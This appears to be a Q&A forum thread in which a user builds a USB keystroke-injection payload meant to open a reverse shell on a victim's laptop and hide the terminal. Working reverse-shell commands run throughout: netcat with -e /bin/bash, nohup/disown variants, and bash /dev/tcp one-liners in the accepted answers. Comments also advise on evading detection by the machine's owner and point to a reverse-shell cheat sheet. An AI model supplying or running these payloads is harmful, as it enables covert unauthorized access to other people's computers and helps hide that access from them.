-1

GOAL: the attacker insert into a victim's laptop an USB which act as a keyboard. The payload opens a terminal, executes a reverse shell and hides the terminal.

PROBLEM: the tests I did locally (ubuntu 19.04, and digispark as usb) are the following:

ONE

terminal A nc -e /bin/bash 10.10.10.10 8888

terminal B nc -vlp 8888

Everything works, I have my shell with the prompt on the terminal B but the terminal A is not hidden.

TWO

terminal A nc -e /bin/bash 10.10.10.10 8888&; disown; exit

terminal B nc -vlp 8888

terminal B just hangs and terminal A is hidden

THREE

terminal A nohup nc -e /bin/bash 10.10.10.10 8888&; exit

terminal B nc -vlp 8888

terminal B just hangs and terminal A is hidden

FOUR

terminal A: I open screen then executenc -e /bin/bash 10.10.10.10 8888 , CTRL^A , then d and finally exit.

terminal B nc -vlp 8888

using screen everything works but I don't want to use screen because is not installed by default

QUESTION: is there a way (using preinstalled tools) to hidden the terminal without screen but with the same effect?

Maicake
  • 497
  • 1
  • 3
  • 13
  • are you sure terminal b just hangs... it could be that bash is not prompting because stdin is not a tty, – Jasen May 09 '20 at 13:39

2 Answers2

1

Using just bash with its inbuilt TCP capability:

bash -il 1<>/dev/tcp/10.10.10.10/8888 2>&1 <&1 & exit

Or slightly more user friendly using script from bsdutils to invoke a pty so you can have propper job control etc...

script /dev/null 1<>/dev/tcp/10.10.10.10/8888 2>&1 <&1 &  exit
Jasen
  • 834
  • 5
  • 8
-1

This worked. Thanks to @Chris Dodd

nohup nc ...& disown; exit

After the shell exits, the terminal will either logout or shutdown (depending on what kind of terminal it is), and send SIGHUP to the controlling process group, which would cause nc to exit.

Using nohup detaches from the terminal and runs nc in its own process group (so it will no longer be in the terminal's controlling process group), so the SIGHUP won't be sent to it.

Maicake
  • 497
  • 1
  • 3
  • 13
  • your nohup contribution is a lot less valuable than @Jasens bash-fu ... – user2497 May 11 '20 at 12:27
  • could you explain me why – Maicake May 11 '20 at 13:58
  • 1
    `ps` listing 'nc' is curious, whereas `bash` is commonly invoked. The owner would need `ps -eww`/netstat/sockstat, or similar (rummage in /proc/) to discover any problem. @Jasens answer passes at-a-glance inspection, `nc` doesn't. I did not mean to be rude, but why mark your own nohup solution as the answer (nohup tends to drop a nohup.out log too), when @Jasen has made such a simple and excellent answer? – user2497 May 16 '20 at 03:09
  • 1
    Because it didn't work simply. And also it is not my solution but from another user. Now I get your point anyway. I 'll try again what Jasen suggested. Thanks – Maicake May 16 '20 at 10:38
  • Perhaps you can use http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet – user2497 May 16 '20 at 11:00